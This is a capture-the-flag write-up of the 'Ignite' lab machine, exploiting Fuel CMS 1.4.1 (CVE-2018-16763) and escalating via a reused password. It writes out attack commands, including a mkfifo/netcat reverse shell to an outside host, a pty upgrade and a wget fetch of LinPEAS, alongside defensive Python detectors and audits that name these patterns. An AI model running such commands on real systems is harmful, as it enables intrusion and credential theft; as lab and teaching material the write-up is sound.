
Setting Up Your First Penetration Testing Lab
Master advanced techniques and methodologies in lab setup
Introduction
This article presents a step-by-step walkthrough of Ignite. We focus on identifying and exploiting the Remote Code Execution (RCE) vulnerability in Fuel CMS v1.4.1 (CVE-2018-16763). The investigation covers enumeration, discovery of the vulnerability, execution of the exploit, and post-exploitation activity. It also shows how privileges are escalated through credential reuse caused by poor configuration, which ultimately leads us to root.
Key Topics:
Enumeration: gathering information and identifying vulnerabilities.
Exploit Analysis: analysing and running the exploit.
Post-Exploitation: activity after the compromise and Privilege Escalation.
1: SCANNING
How to Use Nmap: Target Reconnaissance
Today I am sharing one of the most important tools anyone learning cybersecurity needs: Nmap. If you want to know what is running on another device or server, Nmap is your first friend.
What scan did I perform?
I tried a very powerful command, an Aggressive Scan. The command was written like this: nmap -sV -A -T4 10.81.139.78
-sV (Version Detection): I do not just want to know that a port is open; I want to know exactly which software is running there.
-A (Aggressive Mode): This is the "all-in-one". It combines OS detection, security scripts, and traceroute.
-T4 (Speed): I increased the scan speed so the results come back faster.
nmap -sV -A -T4 10.81.139.78
2: FOOTHOLD
When the scan comes back, you will see that port 80 is open. If you type the IP 10.81.139.78 into a browser, you land on the Fuel CMS home page, where you will find additional information about the database and some of the passwords.
When you scroll to the bottom of the page, you find very important information: the "Admin Endpoint" and the "Credentials" (username and password) used to log in to the system. This is where the weakness of the Ignite system begins.
Finding the Entry Point (Admin Access)
During the enumeration phase I examined the site's home page. When I scrolled to the bottom of the page, I found a gold mine of information that website administrators often forget to remove:
Admin Dashboard: /fuel
- Username: admin
- Password: admin
What does this mean?
Finding the admin page and its password opens a path for us to explore the inside of the Fuel CMS software. Now that we hold the administrative entry point, we can start testing the RCE (Remote Code Execution) vulnerability to take over the whole server.
Getting Into the Dashboard (Gaining Access)
After finding the login details, I visited http://10.81.139.78/fuel. I used the username and password (admin / admin). As expected, I successfully logged in to the Fuel CMS admin dashboard.
Why is this step important? Although I now control the website's administration, my goal is not just to modify the page. The real goal is to obtain Remote Code Execution (RCE).
Since I know this machine runs Fuel CMS v1.4.1, I have now confirmed that I can carry out an attack that gives me a shell, or control of the whole machine, because this version has a security hole known as CVE-2018-16763.
3: Exploit Execution
Vulnerability Discovery
The machine was running Fuel CMS 1.4.1, which is known to have an RCE vulnerability. A Google search led me to Exploit-DB (CVE-2018-16763). I also found the same exploit using the searchsploit tool.
Understanding the Exploit
The vulnerability comes from poor handling of the data submitted in the filter parameter of the /fuel/pages/select/ endpoint. This allows PHP code to be injected, which leads to commands being executed on the machine remotely (RCE).
- Root cause: no validation of what is written to the filter parameter.
- Security impact: an unauthenticated person can execute operating-system commands.
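As an added example (not part of the original walkthrough), here is the allowlist that the missing validation should have enforced, applied as a detection rule over constructed Apache access-log lines: any request to /fuel/pages/select/ whose filter value contains characters outside a page-name allowlist is flagged. The allowlist pattern, the sample log lines and the field names are assumptions; the real CMS accepted a wider set of characters.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Conservative allowlist for a page-name filter: letters, digits, space,
# underscore and hyphen only (an assumption, stricter than the real CMS).
FILTER_ALLOWED = re.compile(r"^[A-Za-z0-9 _\-]{0,64}$")
TARGET_PATH = "/fuel/pages/select/"

# Constructed Apache combined-log lines; not real traffic from the machine.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /fuel/pages/select/?filter=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2024:10:00:09 +0000] "GET /fuel/pages/select/?filter=home%27%29%3B%2F%2A HTTP/1.1" 200 1024 "-" "python-requests/2.31"
10.0.0.9 - - [10/Jan/2024:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2024:10:00:15 +0000] "POST /fuel/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_access_line(line):
    """Return (ip, timestamp, method, request target, status) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("ts"), m.group("method"), m.group("target"), int(m.group("status"))


def filter_values(target):
    """Extract every URL-decoded 'filter' query value from a request target.

    Requests to other paths return an empty list so they are never flagged."""
    parts = urlsplit(target)
    if parts.path != TARGET_PATH:
        return []
    return parse_qs(parts.query, keep_blank_values=True).get("filter", [])


def find_suspicious_filter_requests(log_text):
    """Return one finding per request whose filter value violates the allowlist."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_access_line(line)
        if parsed is None:
            continue
        ip, ts, method, target, status = parsed
        for value in filter_values(target):
            if not FILTER_ALLOWED.match(value):
                findings.append({"ip": ip, "time": ts, "status": status, "filter": value})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_filter_requests(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} filter={f['filter']!r}")
```

The same allowlist check, placed in the application before the parameter reaches any code path that builds or evaluates PHP, is the fix; running it over the access log afterwards tells you whether anyone has already tried.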
searchsploit FUEL CMS 1.4
python 50477.py -u http://10.91.139.78/
whoami
ls
pwd
cd /home
4: Post Exploitation
After confirming that I could execute commands (RCE), I decided to upgrade that connection to a Reverse Shell so I would have a complete terminal to interact with the machine.
I used the website revshells.com to prepare the payload, in Python or Bash form. After opening a listener on my machine with the command nc -lvnp 4444, I ran the reverse-shell command on the Ignite machine.
Immediately I had access to the machine as the www-data user. To make the terminal behave like a real interactive shell, I used the command:
python -c 'import pty; pty.spawn("/bin/bash")'
Once I had the reverse shell and had made the terminal fully interactive, I started exploring the machine's files. As the www-data user I immediately found the first flag, known as the User Flag.
This confirmed that I had successfully entered the system, but I was still not root (the superuser), so I needed to look for a way to escalate my privileges (Privilege Escalation).
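An added example, not from the original write-up: the reverse shell and the pty upgrade described above leave distinctive command lines, and a defender watching process-start events (EDR telemetry, auditd execve records, or a plain ps snapshot) can flag them. The events below are constructed, the rule set and the list of service accounts are assumptions, and the listener address is a documentation-range placeholder.

```python
import re

# Constructed process-start events (user, pid, ppid, command line), the shape an
# EDR, an auditd execve record or `ps -eo user,pid,ppid,args` would give.
SAMPLE_EVENTS = [
    ("root", 412, 1, "/usr/sbin/apache2 -k start"),
    ("www-data", 415, 412, "/usr/sbin/apache2 -k start"),
    ("www-data", 2201, 415,
     "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f"),
    ("www-data", 2210, 2201, "python -c import pty; pty.spawn(\"/bin/bash\")"),
    ("root", 2300, 1, "/usr/sbin/cron -f"),
    ("alice", 2310, 2300, "python -c print(1)"),
]

# Accounts that run a web server and have no business starting interactive shells
# (assumed list; adjust to the platform).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

# Each rule is (name, pattern). They fire on the command line regardless of user.
RULES = [
    ("fifo-backpipe-shell", re.compile(r"mkfifo\s+\S+.*\b(nc|ncat|netcat)\b")),
    ("netcat-exec", re.compile(r"\b(nc|ncat|netcat)\b[^;|]*\s-e\s")),
    ("pty-upgrade", re.compile(r"pty\.spawn\(")),
    ("dev-tcp-redirect", re.compile(r"/dev/tcp/\d")),
]
# `sh -i` / `bash -i` at the start of the line or after a pipe/separator.
INTERACTIVE_SHELL = re.compile(r"(^|[\s|;&])(ba)?sh\s+-i\b")


def evaluate_event(user, cmdline):
    """Return the list of rule names the command line triggers (empty if clean)."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    # An interactive shell is only suspicious when a service account starts it;
    # for a human user it is normal terminal activity.
    if user in SERVICE_ACCOUNTS and INTERACTIVE_SHELL.search(cmdline):
        hits.append("service-account-interactive-shell")
    return hits


def scan_events(events):
    """Return (pid, user, hits) for every event that triggered at least one rule."""
    findings = []
    for user, pid, _ppid, cmdline in events:
        hits = evaluate_event(user, cmdline)
        if hits:
            findings.append((pid, user, hits))
    return findings


if __name__ == "__main__":
    for pid, user, hits in scan_events(SAMPLE_EVENTS):
        print(f"pid={pid} user={user} rules={','.join(hits)}")
```

The parent-child relationship matters as much as the command line: both flagged processes here descend from the apache2 worker (pid 415), which is the process-tree signature of a web application being used to run commands, and a real rule set would raise severity on that ancestry.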
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.219.158 1111 >/tmp/f
5: PRIVILEGE ESCALATION
Privilege Escalation Research
Since I was the ordinary www-data user, I needed to find a way to become the superuser (root). To make that job easier, I transferred the well-known LinPEAS script to the Ignite machine. LinPEAS searched all of the system's files in depth and highlighted a very important finding: hardcoded credentials inside a backup file.
cp /usr/share/peass/linpeas/linpeas.sh .
python -m http.server
wget http://192.168.219.158:8000/linpeas.sh
ls
chmod +x linpeas.sh
./linpeas.sh
Finding the Root Password
When I manually examined the file LinPEAS had pointed me to, I found a password written in plaintext. I suspected that this password belonged to the root user, since some people habitually use a single password in many places (Credential Reuse).
cat /var/www/html/fuel/application/config/database.php
I tried to switch to the root user with the command: su root
I entered the password I had found, and I immediately became root!
Root Flag
Now that I held the highest privilege on the machine, I moved to the /root directory to retrieve the final flag: cat /root/root.txt
Conclusion: What did we learn from Ignite?
This machine is an example of how a chain of weaknesses can lead to the whole machine being taken over:
- 1: Outdated CMS: use of Fuel CMS 1.4.1, which has an RCE vulnerability.
- 2: Unprotected data: storing important passwords in plaintext inside backup files.
- 3: Password Reuse: using one password for several different services.
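An added example (not the author's or the project's code) that covers both the LinPEAS finding above and weaknesses 2 and 3 of the conclusion from the defender's side: an audit that walks a web root, flags leftover backup files, finds plaintext credential assignments in configuration files such as database.php, and reports when such a file is readable by every local account (which is what let www-data read it). The sample web root, the file contents, the backup suffix list and the regular expression are constructed assumptions.

```python
import os
import re
import stat
import tempfile

# Suffixes that indicate an editor or admin left a copy behind in the web root (assumed list).
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".save", ".swp", "~", ".zip", ".tar.gz", ".sql")
# Matches PHP/INI-style secret assignments such as $db['default']['password'] = 'x';
SECRET_RE = re.compile(
    r"""(?i)\b(password|passwd|db_pass\w*|secret|api_key)\b['"]?\]?\s*(?:=>|=|:)\s*['"]([^'"]+)['"]"""
)


def audit_file(path):
    """Return a list of issue strings for one file (empty if nothing was found)."""
    issues = []
    mode = os.stat(path).st_mode
    world_readable = bool(mode & stat.S_IROTH)
    if path.endswith(BACKUP_SUFFIXES):
        issues.append("backup/leftover file inside web root")
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return issues
    for m in SECRET_RE.finditer(text):
        key, value = m.group(1), m.group(2)
        # Never echo the secret itself into the report; mask it and keep the length.
        issues.append(f"plaintext credential: {key}={'*' * len(value)} ({len(value)} chars)")
    if issues and world_readable:
        issues.append("world-readable (mode %o)" % stat.S_IMODE(mode))
    return issues


def audit_webroot(root):
    """Walk a web root and return {relative_path: [issues]} for files with findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            issues = audit_file(full)
            if issues:
                report[os.path.relpath(full, root)] = issues
    return report


def build_sample_webroot(base):
    """Create a constructed web root reproducing the weaknesses discussed above."""
    cfg_dir = os.path.join(base, "fuel", "application", "config")
    os.makedirs(cfg_dir)
    db_cfg = os.path.join(cfg_dir, "database.php")
    with open(db_cfg, "w") as fh:
        fh.write("<?php\n$db['default']['username'] = 'root';\n"
                 "$db['default']['password'] = 'ExampleOnly123';\n")  # constructed value
    os.chmod(db_cfg, 0o644)  # readable by every local account, including www-data
    with open(os.path.join(base, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello';\n")
    leftover = os.path.join(base, "site.sql.bak")
    with open(leftover, "w") as fh:
        fh.write("-- dump\n")
    os.chmod(leftover, 0o640)
    return base


def audit_sample_webroot():
    """Build the sample web root in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_webroot(build_sample_webroot(tmp))


if __name__ == "__main__":
    for rel, issues in audit_sample_webroot().items():
        print(rel)
        for issue in issues:
            print("   -", issue)
```

The credential finding is only the first half of the check: the conclusion's third point (the database password was also the root password) is caught operationally by never sharing passwords between a service account and an interactive login, and the audit above at least tells you which secrets are exposed widely enough that reuse of them becomes fatal.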